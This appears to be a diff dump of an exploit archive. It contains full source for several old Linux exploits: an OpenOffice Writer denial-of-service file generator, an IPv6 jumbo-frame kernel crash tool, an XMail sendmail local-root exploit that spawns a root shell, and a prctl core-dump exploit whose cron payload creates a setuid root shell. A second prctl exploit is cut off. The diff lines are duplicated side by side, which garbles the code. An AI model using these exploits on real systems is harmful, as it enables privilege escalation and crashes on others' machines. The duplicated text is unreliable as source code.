#include <fcntl.h>
struct kernel_dirent {
long d_ino;
long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
#define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2])
#define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2])
int main(void)
{
int fd = open(".", O_RDONLY);
struct kernel_dirent de[2];
while (1) {
int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de);
if (i == -1) break;
if (de[0].d_reclen == 0) break;
printf("SFN: reclen=%2d off=%d ino=%d, %-12s",
de[0].d_reclen, de[0].d_off, de[0].d_ino, de[0].d_name);
if (de[1].d_reclen)
printf("\tLFN: reclen=%2d off=%d ino=%d, %s",
de[1].d_reclen, de[1].d_off, de[1].d_ino, de[1].d_name);
printf("\n");
}
return 0;
}

91
platforms/linux/dos/30091.py Executable file
View file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/24186/info
The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability.
Successful exploits may allow remote attackers to cause denial-of-service conditions on the webserver running the affected application.
OpenOffice 2.2.0 is vulnerable; other versions may also be affected.
import sys
import time
print "--------------------------------------------------------"
print " OpenOffice.org 2.2.0 Writer Denial of Service "
print " url: http://www.openoffice.org/ "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org "
print " "
print " If you want, you can change the file extension in .doc "
print "--------------------------------------------------------"
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"
while 1:
print " OPTIONS "
print " 1 -> Create file exploit.otp "
print " 2 -> Quit\n "
print "--------------------------------------------------------"
choice = 0
while 1:
try:
choice = int(raw_input("Make your choice: "))
if choice != 1 and choice != 2:
print "ehm... Invalid choice...\n"
else:
break
except:
print "ehm... Invalid choice...\n"
if choice == 1:
flag = 1
try:
fileOut = open('exploit.otp','w')
fileOut.write(exploit)
fileOut.close()
print "File created!\nBe safe!"
except:
print "Unable to create file."
if choice == 2:
print "Be safe!"
time.sleep(2)
sys.exit()

268
platforms/linux/dos/4893.c
View file

@ -1,134 +1,134 @@
/* /*
* Clemens Kurtenbach <ckurtenbach at s21sec . com> * Clemens Kurtenbach <ckurtenbach at s21sec . com>
* PoC code for exploiting the jumbo bug found in * PoC code for exploiting the jumbo bug found in
* linux kernels >=2.6.20 and <=2.6.21.1 * linux kernels >=2.6.20 and <=2.6.21.1
* gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash
* *
*/ */
/* io */ /* io */
#include <stdio.h> #include <stdio.h>
#include <string.h> #include <string.h>
#include <stdlib.h> #include <stdlib.h>
/* network */ /* network */
#include <sys/socket.h> #include <sys/socket.h>
#include <linux/if_packet.h> #include <linux/if_packet.h>
#include <linux/if_ether.h> #include <linux/if_ether.h>
#include <linux/if_arp.h> #include <linux/if_arp.h>
#include <netdb.h> #include <netdb.h>
#include <linux/if.h> #include <linux/if.h>
#define MY_FRAME_LEN 1145 #define MY_FRAME_LEN 1145
char *resolve6(unsigned char *target) { char *resolve6(unsigned char *target) {
char *ret_addr; char *ret_addr;
struct in6_addr my_in6; struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6; char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result; struct addrinfo addr_hints, *addr_result;
unsigned char out[64]; unsigned char out[64];
memset(&addr_hints, 0, sizeof(addr_hints)); memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6; addr_hints.ai_family = AF_INET6;
if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf("getaddrinfo() error\n"); printf("getaddrinfo() error\n");
exit(1); exit(1);
} }
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf("getnameinfo() error\n"); printf("getnameinfo() error\n");
exit(1); exit(1);
} }
if(inet_pton(AF_INET6, out, glob_addr) < 0) { if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf("inet_pton() error\n"); printf("inet_pton() error\n");
exit(1); exit(1);
} }
if((ret_addr = malloc(16)) == NULL) { if((ret_addr = malloc(16)) == NULL) {
printf("malloc() error\n"); printf("malloc() error\n");
exit(1); exit(1);
} }
memcpy(ret_addr, my_in6.s6_addr, 16); memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr; return ret_addr;
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
if (argc < 4) { if (argc < 4) {
printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n"); printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n");
exit(1); exit(1);
} }
/* handle IPv6 destination */ /* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]); unsigned char *dest_ip = resolve6(argv[1]);
/* handle MAC */ /* handle MAC */
unsigned char dest_mac[7]; unsigned char dest_mac[7];
sscanf(argv[2], "%x:%x:%x:%x:%x:%x", sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
(unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1], (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3], (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]); (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);
/* handle interface */ /* handle interface */
unsigned char *iface; unsigned char *iface;
iface = argv[3]; iface = argv[3];
/* buffer for ethernet frame */ /* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN); void *buffer = (void*)malloc(MY_FRAME_LEN);
/* pointer to ethenet header */ /* pointer to ethenet header */
unsigned char *etherhead = buffer; unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead; struct ethhdr *eh = (struct ethhdr *)etherhead;
/* our MAC address */ /* our MAC address */
unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
/* prepare socket */ /* prepare socket */
int s; int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) { if (s < 0) {
printf("cannot create socket: [%d]\n",s); printf("cannot create socket: [%d]\n",s);
exit(1); exit(1);
} }
/* RAW communication */ /* RAW communication */
struct sockaddr_ll socket_address; struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET; socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP); socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface); socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER; socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST; socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN; socket_address.sll_halen = ETH_ALEN;
/* set the frame header */ /* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6 eh->h_proto = 0xdd86; // IPv6
/* the buffer we want to send */ /* the buffer we want to send */
unsigned char bad_buffer[] = { unsigned char bad_buffer[] = {
0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
/* overwrite our src and dst ip */ /* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16); memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16); memcpy((void*)(buffer+38), dest_ip, 16);
/* send the buffer */ /* send the buffer */
int send_result = 0; int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address)); send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) { if (send_result == -1) {
printf("could not send frame: [%d]\n", send_result); printf("could not send frame: [%d]\n", send_result);
exit(1); exit(1);
} }
else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]); else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]);
return 0; return 0;
} }
// milw0rm.com [2008-01-11] // milw0rm.com [2008-01-11]

502
platforms/linux/local/1267.c
View file

@ -1,251 +1,251 @@
/* /*
* XMail 1.21 'sendmail' local exploit (ret-into-libc) * XMail 1.21 'sendmail' local exploit (ret-into-libc)
* Yields uid root || gid mail * Yields uid root || gid mail
* By qaaz [at] centrum [dot] cz, 2005 * By qaaz [at] centrum [dot] cz, 2005
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <unistd.h> #include <unistd.h>
#include <string.h> #include <string.h>
#include <signal.h> #include <signal.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/var/MailRoot/bin/sendmail" #define TARGET "/var/MailRoot/bin/sendmail"
#define NM "nm" #define NM "nm"
#define GREP "grep" #define GREP "grep"
#define MKDIR "mkdir" #define MKDIR "mkdir"
#define TMP "/tmp" #define TMP "/tmp"
#define MAILROOT TMP"/mr" #define MAILROOT TMP"/mr"
#define ID "/usr/bin/id" #define ID "/usr/bin/id"
#define SH "/bin/sh" #define SH "/bin/sh"
#define OVERLEN (256+12 + 16) #define OVERLEN (256+12 + 16)
/* EmitRecipients() stack */ /* EmitRecipients() stack */
/* | locals + padding + PUSHes | RET | Arg1... | */ /* | locals + padding + PUSHes | RET | Arg1... | */
/* |<--------- OVERLEN ------->| */ /* |<--------- OVERLEN ------->| */
#define MAX(x,y) (((x)>(y)) ? (x) : (y)) #define MAX(x,y) (((x)>(y)) ? (x) : (y))
char *libc_file = NULL; char *libc_file = NULL;
unsigned int libc_base = 0; unsigned int libc_base = 0;
unsigned int stack_base = 0; unsigned int stack_base = 0;
unsigned int file_addr = 0; unsigned int file_addr = 0;
unsigned int system_addr = 0; unsigned int system_addr = 0;
int pid; int pid;
int pi[2], po[2], pe[2]; int pi[2], po[2], pe[2];
void sigchild(int sig) void sigchild(int sig)
{ {
if (waitpid(pid, NULL, WNOHANG) == pid) { if (waitpid(pid, NULL, WNOHANG) == pid) {
printf("[*] Vuln terminated\n"); printf("[*] Vuln terminated\n");
exit(-1); exit(-1);
} }
} }
void killchild() void killchild()
{ {
if (pid) kill(pid, SIGKILL); if (pid) kill(pid, SIGKILL);
} }
char bad_chars(char *buf, int len) char bad_chars(char *buf, int len)
{ {
int i; int i;
if (len == 0) len == strlen(buf); if (len == 0) len == strlen(buf);
for (i = 0; i < len; i++) { for (i = 0; i < len; i++) {
if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i])) if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i]))
return buf[i]; return buf[i];
} }
return 0; return 0;
} }
unsigned int get_sym(char *lib, char *sym) unsigned int get_sym(char *lib, char *sym)
{ {
FILE *f; FILE *f;
char buf[1024]; char buf[1024];
unsigned int val = 0; unsigned int val = 0;
sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym); sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym);
if (f = popen(buf, "r")) { if (f = popen(buf, "r")) {
fgets(buf, sizeof(buf), f); fgets(buf, sizeof(buf), f);
sscanf(buf, "%08lx %*s %*s", &val); sscanf(buf, "%08lx %*s %*s", &val);
pclose(f); pclose(f);
} }
return val; return val;
} }
unsigned int check_sym(char *lib, char *sym, unsigned int base) unsigned int check_sym(char *lib, char *sym, unsigned int base)
{ {
unsigned int offs = get_sym(lib, sym); unsigned int offs = get_sym(lib, sym);
unsigned int addr = base + offs; unsigned int addr = base + offs;
if (!offs) { if (!offs) {
printf("[-] %s: not found?\n", sym); printf("[-] %s: not found?\n", sym);
return 0; return 0;
} }
if (bad_chars((char *) &addr, 4)) { if (bad_chars((char *) &addr, 4)) {
printf("[-] %s: 0x%08x, bad chars\n", sym, addr); printf("[-] %s: 0x%08x, bad chars\n", sym, addr);
return 0; return 0;
} }
printf("[+] %s: 0x%08x\n", sym, addr); printf("[+] %s: 0x%08x\n", sym, addr);
return addr; return addr;
} }
void do_maps(int pid) void do_maps(int pid)
{ {
FILE *f; FILE *f;
char buf[1024]; char buf[1024];
sprintf(buf, "/proc/%d/maps", pid); sprintf(buf, "/proc/%d/maps", pid);
if (!(f = fopen(buf, "r"))) return; if (!(f = fopen(buf, "r"))) return;
while (fgets(buf, sizeof(buf), f)) { while (fgets(buf, sizeof(buf), f)) {
unsigned int addr_beg, addr_end; unsigned int addr_beg, addr_end;
char pathname[1024]; char pathname[1024];
int offset; int offset;
pathname[0] = 0; pathname[0] = 0;
sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s", sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s",
&addr_beg, &addr_end, &offset, pathname); &addr_beg, &addr_end, &offset, pathname);
if (offset < 0) if (offset < 0)
stack_base = addr_end; stack_base = addr_end;
else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base)) else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base))
libc_base = addr_beg, libc_file = (char *) strdup(pathname); libc_base = addr_beg, libc_file = (char *) strdup(pathname);
} }
fclose(f); fclose(f);
} }
void do_syms() void do_syms()
{ {
if (!(file_addr = check_sym(libc_file, "stdout", libc_base)) if (!(file_addr = check_sym(libc_file, "stdout", libc_base))
&& !(file_addr = check_sym(libc_file, "stderr", libc_base)) && !(file_addr = check_sym(libc_file, "stderr", libc_base))
&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) { && !(file_addr = check_sym(libc_file, "stdin", libc_base))) {
printf("[-] Can't use std files\n"); printf("[-] Can't use std files\n");
exit(-1); exit(-1);
} }
if (!(system_addr = check_sym(libc_file, "system", libc_base))) { if (!(system_addr = check_sym(libc_file, "system", libc_base))) {
printf("[-] Can't use system()\n"); printf("[-] Can't use system()\n");
exit(-1); exit(-1);
} }
} }
void do_shell() void do_shell()
{ {
fd_set fds; fd_set fds;
struct timeval tv; struct timeval tv;
int retval, maxfd; int retval, maxfd;
char buf[1024]; char buf[1024];
maxfd = MAX(0, MAX(po[0], pe[0])) + 1; maxfd = MAX(0, MAX(po[0], pe[0])) + 1;
while (1) { while (1) {
FD_ZERO(&fds); FD_ZERO(&fds);
FD_SET(0, &fds); FD_SET(0, &fds);
FD_SET(po[0], &fds); FD_SET(po[0], &fds);
FD_SET(pe[0], &fds); FD_SET(pe[0], &fds);
tv.tv_sec = 0; tv.tv_sec = 0;
tv.tv_usec = 100; tv.tv_usec = 100;
if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break; if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break;
if (FD_ISSET(0, &fds)) { if (FD_ISSET(0, &fds)) {
if ((retval = read(0, buf, sizeof(buf))) <= 0) break; if ((retval = read(0, buf, sizeof(buf))) <= 0) break;
write(pi[1], buf, retval); write(pi[1], buf, retval);
} }
if (FD_ISSET(po[0], &fds)) { if (FD_ISSET(po[0], &fds)) {
if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break; if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break;
write(1, buf, retval); write(1, buf, retval);
} }
if (FD_ISSET(pe[0], &fds)) { if (FD_ISSET(pe[0], &fds)) {
if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break; if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break;
write(2, buf, retval); write(2, buf, retval);
} }
} }
} }
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
if (argc > 1 && !strcmp(argv[1], "-sh")) { if (argc > 1 && !strcmp(argv[1], "-sh")) {
setresuid(geteuid(), geteuid(), geteuid()); setresuid(geteuid(), geteuid(), geteuid());
setresgid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid());
system(ID); system(ID);
execl(SH, SH, "-i", NULL); execl(SH, SH, "-i", NULL);
perror("execl"); perror("execl");
exit(-1); exit(-1);
} }
if (pipe(pi) || pipe(po) || pipe(pe)) { if (pipe(pi) || pipe(po) || pipe(pe)) {
perror("[-] pipe"); perror("[-] pipe");
return -1; return -1;
} }
if ((pid = fork()) == -1) { if ((pid = fork()) == -1) {
perror("[-] fork"); perror("[-] fork");
return -1; return -1;
} }
if (pid) { if (pid) {
unsigned int i; unsigned int i;
char buf[10*1024]; char buf[10*1024];
atexit(killchild); atexit(killchild);
signal(SIGCHLD, sigchild); signal(SIGCHLD, sigchild);
sleep(1); sleep(1);
printf("[*] Reading maps...\n"); printf("[*] Reading maps...\n");
do_maps(pid); do_maps(pid);
printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base); printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base);
if (!libc_base) exit(-1); if (!libc_base) exit(-1);
printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base); printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base);
if (!stack_base) exit(-1); if (!stack_base) exit(-1);
printf("[*] Getting symbols...\n"); printf("[*] Getting symbols...\n");
do_syms(); do_syms();
strcpy(buf, "To: h4h4@"); strcpy(buf, "To: h4h4@");
for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5 for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5
strcat(buf, "A"); strcat(buf, "A");
strncat(buf, (char *) &system_addr, 4); strncat(buf, (char *) &system_addr, 4);
strncat(buf, (char *) &file_addr, 4); strncat(buf, (char *) &file_addr, 4);
i = stack_base - 5000; i = stack_base - 5000;
strncat(buf, (char *) &i, 4); strncat(buf, (char *) &i, 4);
strcat(buf, "\n"); strcat(buf, "\n");
write(pi[1], buf, strlen(buf)); write(pi[1], buf, strlen(buf));
sleep(1); do_shell(); sleep(1); do_shell();
printf("[*] Done\n"); printf("[*] Done\n");
exit(1); exit(1);
} }
else { else {
char buf[10*1024]; char buf[10*1024];
char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL }; char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL };
char *_arg[3] = { TARGET, "-t", NULL }; char *_arg[3] = { TARGET, "-t", NULL };
sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT); sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT);
system(buf); system(buf);
sprintf(buf, "%10000s -sh", argv[0]); sprintf(buf, "%10000s -sh", argv[0]);
_env[0] = (char *) strdup(buf); _env[0] = (char *) strdup(buf);
printf("[*] Executing vuln...\n"); printf("[*] Executing vuln...\n");
close(0); dup2(pi[0], 0); close(0); dup2(pi[0], 0);
close(1); dup2(po[1], 1); close(1); dup2(po[1], 1);
close(2); dup2(pe[1], 2); close(2); dup2(pe[1], 2);
execve(_arg[0], _arg, _env); execve(_arg[0], _arg, _env);
perror("[-] execve"); perror("[-] execve");
return -1; return -1;
} }
exit(1); exit(1);
} }
// milw0rm.com [2005-10-20] // milw0rm.com [2005-10-20]

6
platforms/linux/local/140.c
View file

@ -44,6 +44,6 @@ int main (int argc, char ** argv)
memcpy((char *)out+63, shellcode, strlen(shellcode)); memcpy((char *)out+63, shellcode, strlen(shellcode));
execl (BIN, BIN, "-xsokdir", out, 0x0); execl (BIN, BIN, "-xsokdir", out, 0x0);
} }
// milw0rm.com [2004-01-02] // milw0rm.com [2004-01-02]

104
platforms/linux/local/2004.c
View file

@ -1,52 +1,52 @@
/*****************************************************/ /*****************************************************/
/* Local r00t Exploit for: */ /* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */ /* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */ /* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */ /* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */ /* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */ /* [ 10.Jul.2006 ] */
/*****************************************************/ /*****************************************************/
#include <stdio.h> #include <stdio.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <unistd.h> #include <unistd.h>
#include <linux/prctl.h> #include <linux/prctl.h>
#include <stdlib.h> #include <stdlib.h>
#include <sys/types.h> #include <sys/types.h>
#include <signal.h> #include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() { int main() {
int child; int child;
struct rlimit corelimit; struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n"); printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n"); printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n"); printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) { if ( !( child = fork() )) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(200); sleep(200);
exit(1); exit(1);
} }
kill(child, SIGSEGV); kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62); sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i"); system("/tmp/sh -i");
} }
// milw0rm.com [2006-07-11] // milw0rm.com [2006-07-11]

254
platforms/linux/local/2005.c
View file

@ -1,127 +1,127 @@
/* Linux >= 2.6.13 prctl kernel exploit /* Linux >= 2.6.13 prctl kernel exploit
* *
* (C) Julien TINNES * (C) Julien TINNES
* *
* If you read the Changelog from 2.6.13 you've probably seen: * If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump * [PATCH] setuid core dump
* *
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
